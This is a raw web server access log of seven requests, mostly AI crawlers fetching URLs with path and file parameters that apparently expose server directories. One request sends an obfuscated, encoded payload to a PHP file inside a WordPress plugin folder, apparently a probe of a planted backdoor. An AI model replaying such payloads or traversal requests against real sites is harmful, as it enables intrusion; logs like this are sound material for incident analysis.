20.171.207.78 - - [22/Oct/2025:00:36:20 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/device/driver/virtio1/block/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:21 +0000] "GET /496429956/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/496429956?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.28.118.16 - - [22/Oct/2025:00:36:21 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//lib/x86_64-linux-gnu/xtables/libebt_802_3.so&path=//lib/x86_64-linux-gnu/xtables HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.135.21.75 - - [22/Oct/2025:00:36:22 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363932322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333332322q6165323662313934386230363561613532326438326666616539636161636535222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
20.171.207.217 - - [22/Oct/2025:00:36:23 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/loop5/subsystem/vda/device/block/vda/subsystem/vda/device/block/vda/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:23 +0000] "GET /227292184?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:36:23 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda1/subsystem/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
